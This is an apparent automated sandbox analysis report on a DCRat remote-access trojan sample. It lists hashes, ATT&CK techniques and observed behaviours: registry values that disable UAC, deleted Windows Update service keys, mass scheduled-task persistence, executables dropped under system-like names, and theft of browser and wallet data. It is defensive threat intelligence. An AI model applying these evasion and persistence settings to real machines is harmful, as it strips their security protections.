dcrat | d94aec0bdc801cd7cad261af02d7ed8f171374b1fbd101449013c2d166dc07ce

Analysis

max time kernel
145s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2022 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

084edc7b5451c4e18a20ca7982787742.exe
Size

1.4MB
MD5

084edc7b5451c4e18a20ca7982787742
SHA1

0c9899f2b4b46bfd903ce96b0c73899e6ba6952d
SHA256

d94aec0bdc801cd7cad261af02d7ed8f171374b1fbd101449013c2d166dc07ce
SHA512

c3c45b858524d0010f2f9124f6cdc01de1f5e1100c41914fbb9c9150c7d98840d7c0d18a4b976e74bc289654485b2fc8aaa0a8246d3e27ab3dd0e6c42728305f
SSDEEP

24576:xJiN7JdiObNHEnToSiqX4uKlyz/hQQ6c0gJgkKrM7cCFm:xJUJoKEn9iSKlkW9ekCRF

Score

10^/10

dcrat discovery evasion exploit infostealer rat spyware stealer trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Process spawned unexpected child process 51 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4376	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4824	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4900	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4800	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2680	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1800	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	920	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1780	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3832	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3356	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3588	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4704	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1264	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3176	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3720	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1188	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3868	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2540	4380	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	936	4380	schtasks.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

explorer.exe084edc7b5451c4e18a20ca7982787742.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	084edc7b5451c4e18a20ca7982787742.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	084edc7b5451c4e18a20ca7982787742.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	084edc7b5451c4e18a20ca7982787742.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral2/memory/4072-132-0x0000000000CB0000-0x0000000000E12000-memory.dmp	dcrat
C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe	dcrat
C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe	dcrat

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 5 IoCs

Processes:

explorer.exenew1.exeC4Updater.exeSysApp.exefodhelper.exe

pid process

3564 explorer.exe
1384 new1.exe
2956 C4Updater.exe
1800 SysApp.exe
3424 fodhelper.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

icacls.exetakeown.exe

pid process

3904 icacls.exe
4152 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
3564	explorer.exe
1384	new1.exe
2956	C4Updater.exe
1800	SysApp.exe
3424	fodhelper.exe

pid	process
3904	icacls.exe
4152	takeown.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

084edc7b5451c4e18a20ca7982787742.exeexplorer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	084edc7b5451c4e18a20ca7982787742.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	explorer.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4152 takeown.exe
3904 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
4152	takeown.exe
3904	icacls.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

084edc7b5451c4e18a20ca7982787742.exeexplorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	084edc7b5451c4e18a20ca7982787742.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	084edc7b5451c4e18a20ca7982787742.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe

Drops file in Program Files directory 10 IoCs

Processes:

084edc7b5451c4e18a20ca7982787742.execonhost.exe

description	ioc	process
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\cc11b995f2a76d	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\StartMenuExperienceHost.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\es-ES\csrss.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\es-ES\886983d96e3d3e	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\winlogon.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\explorer.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\7a0fd90576e088	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Program Files\SmartScreenQC\Defender\DefenderProtection.exe	conhost.exe
File opened for modification	C:\Program Files\SmartScreenQC\Defender\DefenderProtection.exe	conhost.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\55b276f4edf653	084edc7b5451c4e18a20ca7982787742.exe

Drops file in Windows directory 9 IoCs

Processes:

084edc7b5451c4e18a20ca7982787742.exe

description	ioc	process
File created	C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\24dbde2999530e	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\AppReadiness\ba225a52cc4d89	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\winlogon.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\Assets\cc11b995f2a76d	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\Vss\Writers\RuntimeBroker.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\Vss\Writers\9e8d7a4ca61bd9	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe	084edc7b5451c4e18a20ca7982787742.exe
File created	C:\Windows\AppReadiness\084edc7b5451c4e18a20ca7982787742.exe	084edc7b5451c4e18a20ca7982787742.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe	084edc7b5451c4e18a20ca7982787742.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

5336 sc.exe
556 sc.exe
4248 sc.exe
5584 sc.exe
4280 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
5336	sc.exe
556	sc.exe
4248	sc.exe
5584	sc.exe
4280	sc.exe

Creates scheduled task(s) 1 TTPs 52 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
2084	schtasks.exe
5032	schtasks.exe
2032	schtasks.exe
4784	schtasks.exe
2508	schtasks.exe
3592	schtasks.exe
1004	schtasks.exe
3176	schtasks.exe
1452	schtasks.exe
1444	schtasks.exe
4900	schtasks.exe
116	schtasks.exe
1384	schtasks.exe
4088	schtasks.exe
5000	schtasks.exe
920	schtasks.exe
2228	schtasks.exe
3832	schtasks.exe
3620	schtasks.exe
4376	schtasks.exe
4800	schtasks.exe
4752	schtasks.exe
212	schtasks.exe
1780	schtasks.exe
4824	schtasks.exe
4184	schtasks.exe
2624	schtasks.exe
1400	schtasks.exe
3588	schtasks.exe
2540	schtasks.exe
936	schtasks.exe
2144	schtasks.exe
1800	schtasks.exe
3356	schtasks.exe
1504	schtasks.exe
2680	schtasks.exe
4736	schtasks.exe
2340	schtasks.exe
4704	schtasks.exe
1924	schtasks.exe
3676	schtasks.exe
4956	schtasks.exe
1264	schtasks.exe
3720	schtasks.exe
5004	schtasks.exe
556	schtasks.exe
1188	schtasks.exe
3868	schtasks.exe
4872	schtasks.exe
3552	schtasks.exe
3756	schtasks.exe
4596	schtasks.exe

Modifies registry class 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings explorer.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

5264 reg.exe
2144 reg.exe
3456 reg.exe
4672 reg.exe
5536 reg.exe
5624 reg.exe
644 reg.exe
2236 reg.exe
1964 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	explorer.exe

pid	process
5264	reg.exe
2144	reg.exe
3456	reg.exe
4672	reg.exe
5536	reg.exe
5624	reg.exe
644	reg.exe
2236	reg.exe
1964	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

084edc7b5451c4e18a20ca7982787742.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexplorer.exe

pid	process
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
4072	084edc7b5451c4e18a20ca7982787742.exe
1728	powershell.exe
1728	powershell.exe
2968	powershell.exe
2968	powershell.exe
4228	powershell.exe
4228	powershell.exe
3416	powershell.exe
3416	powershell.exe
3464	powershell.exe
3464	powershell.exe
1620	powershell.exe
1620	powershell.exe
4980	powershell.exe
4980	powershell.exe
2620	powershell.exe
2620	powershell.exe
4600	powershell.exe
4600	powershell.exe
2456	powershell.exe
2456	powershell.exe
4936	powershell.exe
4936	powershell.exe
2192	powershell.exe
2192	powershell.exe
3368	powershell.exe
3368	powershell.exe
1884	powershell.exe
1884	powershell.exe
3472	powershell.exe
3472	powershell.exe
1404	powershell.exe
1404	powershell.exe
2576	powershell.exe
2576	powershell.exe
3564	explorer.exe
3564	explorer.exe
4228	powershell.exe
4228	powershell.exe
1728	powershell.exe
1728	powershell.exe
2968	powershell.exe
2968	powershell.exe
3464	powershell.exe
3464	powershell.exe
3416	powershell.exe
3416	powershell.exe
2620	powershell.exe
4980	powershell.exe
4600	powershell.exe
2192	powershell.exe
1620	powershell.exe
1620	powershell.exe
2456	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

explorer.exe

pid process

3564 explorer.exe

pid	process
3564	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	4072	084edc7b5451c4e18a20ca7982787742.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	3564	explorer.exe
Token: SeDebugPrivilege	1384	new1.exe
Token: SeDebugPrivilege	5460	powershell.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeIncreaseQuotaPrivilege	5492	powershell.exe
Token: SeSecurityPrivilege	5492	powershell.exe
Token: SeTakeOwnershipPrivilege	5492	powershell.exe
Token: SeLoadDriverPrivilege	5492	powershell.exe
Token: SeSystemProfilePrivilege	5492	powershell.exe
Token: SeSystemtimePrivilege	5492	powershell.exe
Token: SeProfSingleProcessPrivilege	5492	powershell.exe
Token: SeIncBasePriorityPrivilege	5492	powershell.exe
Token: SeCreatePagefilePrivilege	5492	powershell.exe
Token: SeBackupPrivilege	5492	powershell.exe
Token: SeRestorePrivilege	5492	powershell.exe
Token: SeShutdownPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeSystemEnvironmentPrivilege	5492	powershell.exe
Token: SeRemoteShutdownPrivilege	5492	powershell.exe
Token: SeUndockPrivilege	5492	powershell.exe
Token: SeManageVolumePrivilege	5492	powershell.exe
Token: 33	5492	powershell.exe
Token: 34	5492	powershell.exe
Token: 35	5492	powershell.exe
Token: 36	5492	powershell.exe
Token: SeIncreaseQuotaPrivilege	5492	powershell.exe
Token: SeSecurityPrivilege	5492	powershell.exe
Token: SeTakeOwnershipPrivilege	5492	powershell.exe
Token: SeLoadDriverPrivilege	5492	powershell.exe
Token: SeSystemProfilePrivilege	5492	powershell.exe
Token: SeSystemtimePrivilege	5492	powershell.exe
Token: SeProfSingleProcessPrivilege	5492	powershell.exe
Token: SeIncBasePriorityPrivilege	5492	powershell.exe
Token: SeCreatePagefilePrivilege	5492	powershell.exe
Token: SeBackupPrivilege	5492	powershell.exe
Token: SeRestorePrivilege	5492	powershell.exe
Token: SeShutdownPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeSystemEnvironmentPrivilege	5492	powershell.exe
Token: SeRemoteShutdownPrivilege	5492	powershell.exe
Token: SeUndockPrivilege	5492	powershell.exe
Token: SeManageVolumePrivilege	5492	powershell.exe
Token: 33	5492	powershell.exe
Token: 34	5492	powershell.exe
Token: 35	5492	powershell.exe
Token: 36	5492	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

084edc7b5451c4e18a20ca7982787742.exeexplorer.exeC4Updater.execonhost.execmd.exe

description	pid	process	target process
PID 4072 wrote to memory of 1728	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1728	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2968	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2968	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3416	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3416	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4228	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4228	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3464	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3464	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1620	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1620	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4600	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4600	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2620	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2620	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2456	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2456	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4936	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4936	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2192	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2192	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4980	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 4980	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3368	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3368	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1404	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1404	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1088	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1088	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1884	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 1884	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3472	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3472	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2576	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 2576	4072	084edc7b5451c4e18a20ca7982787742.exe	powershell.exe
PID 4072 wrote to memory of 3564	4072	084edc7b5451c4e18a20ca7982787742.exe	explorer.exe
PID 4072 wrote to memory of 3564	4072	084edc7b5451c4e18a20ca7982787742.exe	explorer.exe
PID 3564 wrote to memory of 5476	3564	explorer.exe	WScript.exe
PID 3564 wrote to memory of 5476	3564	explorer.exe	WScript.exe
PID 3564 wrote to memory of 5592	3564	explorer.exe	WScript.exe
PID 3564 wrote to memory of 5592	3564	explorer.exe	WScript.exe
PID 3564 wrote to memory of 1384	3564	explorer.exe	new1.exe
PID 3564 wrote to memory of 1384	3564	explorer.exe	new1.exe
PID 3564 wrote to memory of 1384	3564	explorer.exe	new1.exe
PID 3564 wrote to memory of 2956	3564	explorer.exe	C4Updater.exe
PID 3564 wrote to memory of 2956	3564	explorer.exe	C4Updater.exe
PID 3564 wrote to memory of 1800	3564	explorer.exe	SysApp.exe
PID 3564 wrote to memory of 1800	3564	explorer.exe	SysApp.exe
PID 3564 wrote to memory of 1800	3564	explorer.exe	SysApp.exe
PID 2956 wrote to memory of 4520	2956	C4Updater.exe	conhost.exe
PID 2956 wrote to memory of 4520	2956	C4Updater.exe	conhost.exe
PID 2956 wrote to memory of 4520	2956	C4Updater.exe	conhost.exe
PID 4520 wrote to memory of 5460	4520	conhost.exe	powershell.exe
PID 4520 wrote to memory of 5460	4520	conhost.exe	powershell.exe
PID 4520 wrote to memory of 5200	4520	conhost.exe	cmd.exe
PID 4520 wrote to memory of 5200	4520	conhost.exe	cmd.exe
PID 4520 wrote to memory of 5492	4520	conhost.exe	powershell.exe
PID 4520 wrote to memory of 5492	4520	conhost.exe	powershell.exe
PID 5200 wrote to memory of 5336	5200	cmd.exe	sc.exe
PID 5200 wrote to memory of 5336	5200	cmd.exe	sc.exe
PID 5200 wrote to memory of 556	5200	cmd.exe	sc.exe
PID 5200 wrote to memory of 556	5200	cmd.exe	sc.exe
PID 5200 wrote to memory of 4248	5200	cmd.exe	sc.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

Processes:

084edc7b5451c4e18a20ca7982787742.exeexplorer.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	084edc7b5451c4e18a20ca7982787742.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	084edc7b5451c4e18a20ca7982787742.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	084edc7b5451c4e18a20ca7982787742.exe

C:\Users\Admin\AppData\Local\Temp\084edc7b5451c4e18a20ca7982787742.exe
"C:\Users\Admin\AppData\Local\Temp\084edc7b5451c4e18a20ca7982787742.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
